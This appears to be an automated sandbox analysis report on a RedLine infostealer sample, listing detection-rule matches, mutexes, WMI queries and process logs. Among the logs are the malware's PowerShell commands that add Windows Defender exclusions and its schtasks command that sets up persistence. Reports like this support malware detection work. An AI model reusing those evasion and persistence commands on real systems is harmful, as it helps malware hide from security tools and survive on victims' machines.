                    Source: 0.2.l2rMtmFkD6.exe.3a68630.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 0.2.l2rMtmFkD6.exe.3a68630.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 11.2.ECcZgk.exe.37f0c38.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 11.2.ECcZgk.exe.37f0c38.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 11.2.ECcZgk.exe.37d8e18.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 11.2.ECcZgk.exe.37d8e18.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0.2.l2rMtmFkD6.exe.3a80450.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 0.2.l2rMtmFkD6.exe.3a80450.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0.2.l2rMtmFkD6.exe.3a68630.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 0.2.l2rMtmFkD6.exe.3a68630.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 00000008.00000002.2204536815.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 0000000B.00000002.2194835748.00000000037D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 00000000.00000002.2100406003.0000000003A68000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: Process Memory Space: l2rMtmFkD6.exe PID: 6156, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: Process Memory Space: l2rMtmFkD6.exe PID: 3524, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: Process Memory Space: ECcZgk.exe PID: 1848, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: l2rMtmFkD6.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: ECcZgk.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 0.2.l2rMtmFkD6.exe.3b20c50.2.raw.unpack, cekC21ULw7jnXCJgV1.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.l2rMtmFkD6.exe.3b20c50.2.raw.unpack, cekC21ULw7jnXCJgV1.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.l2rMtmFkD6.exe.3b20c50.2.raw.unpack, cekC21ULw7jnXCJgV1.csSecurity API names: _0020.AddAccessRule
                    Source: 0.2.l2rMtmFkD6.exe.5f90000.5.raw.unpack, EHDhQ9fEEtfuXrOd2d.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.l2rMtmFkD6.exe.3b20c50.2.raw.unpack, EHDhQ9fEEtfuXrOd2d.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.l2rMtmFkD6.exe.5f90000.5.raw.unpack, cekC21ULw7jnXCJgV1.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.l2rMtmFkD6.exe.5f90000.5.raw.unpack, cekC21ULw7jnXCJgV1.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.l2rMtmFkD6.exe.5f90000.5.raw.unpack, cekC21ULw7jnXCJgV1.csSecurity API names: _0020.AddAccessRule
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@21/107@1/1
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeFile created: C:\Users\user\AppData\Roaming\ECcZgk.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6968:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3648:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4028:120:WilError_03
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeMutant created: \Sessions\1\BaseNamedObjects\fwEkEExcrfONGRJ
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1292:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3208:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4324:120:WilError_03
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeFile created: C:\Users\user\AppData\Local\Temp\tmp5831.tmpJump to behavior
                    Source: l2rMtmFkD6.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: l2rMtmFkD6.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: l2rMtmFkD6.exe, 00000000.00000000.2009996260.00000000005C2000.00000002.00000001.01000000.00000003.sdmp, ECcZgk.exe.0.drBinary or memory string: INSERT INTO [dbo].[Lists] ([Name]) VALUES (@Name);
                    Source: ECcZgk.exe, 0000000E.00000002.2334589436.000000000728F000.00000004.00000020.00020000.00000000.sdmp, ECcZgk.exe, 0000000E.00000002.2314976048.0000000003577000.00000004.00000800.00020000.00000000.sdmp, ECcZgk.exe, 0000000E.00000002.2334589436.00000000072A4000.00000004.00000020.00020000.00000000.sdmp, tmp945C.tmp.14.dr, tmp1591.tmp.14.dr, tmp88C7.tmp.8.dr, tmp156F.tmp.14.dr, tmp949D.tmp.14.dr, tmp15A2.tmp.14.dr, tmp8928.tmp.8.dr, tmp943C.tmp.14.dr, tmp6EA6.tmp.8.dr, tmp6EB9.tmp.8.dr, tmp1590.tmp.14.dr, tmp157F.tmp.14.dr, tmp8929.tmp.8.dr, tmp8908.tmp.8.dr, tmp8907.tmp.8.dr, tmpCC96.tmp.14.dr, tmp6EA7.tmp.8.dr, tmp6EB8.tmp.8.dr, tmp6E96.tmp.8.dr, tmp15B2.tmp.14.dr, tmp88A7.tmp.8.dr, tmp6E95.tmp.8.dr, tmp946D.tmp.14.dr, tmp5BB6.tmp.14.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeFile read: C:\Users\user\Desktop\l2rMtmFkD6.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\l2rMtmFkD6.exe "C:\Users\user\Desktop\l2rMtmFkD6.exe"
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\l2rMtmFkD6.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ECcZgk.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ECcZgk" /XML "C:\Users\user\AppData\Local\Temp\tmp5831.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess created: C:\Users\user\Desktop\l2rMtmFkD6.exe "C:\Users\user\Desktop\l2rMtmFkD6.exe"
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\ECcZgk.exe C:\Users\user\AppData\Roaming\ECcZgk.exe
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ECcZgk" /XML "C:\Users\user\AppData\Local\Temp\tmp7D1E.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess created: C:\Users\user\AppData\Roaming\ECcZgk.exe "C:\Users\user\AppData\Roaming\ECcZgk.exe"
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\l2rMtmFkD6.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ECcZgk.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ECcZgk" /XML "C:\Users\user\AppData\Local\Temp\tmp5831.tmp"Jump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess created: C:\Users\user\Desktop\l2rMtmFkD6.exe "C:\Users\user\Desktop\l2rMtmFkD6.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ECcZgk" /XML "C:\Users\user\AppData\Local\Temp\tmp7D1E.tmp"
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeProcess created: C:\Users\user\AppData\Roaming\ECcZgk.exe "C:\Users\user\AppData\Roaming\ECcZgk.exe"
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
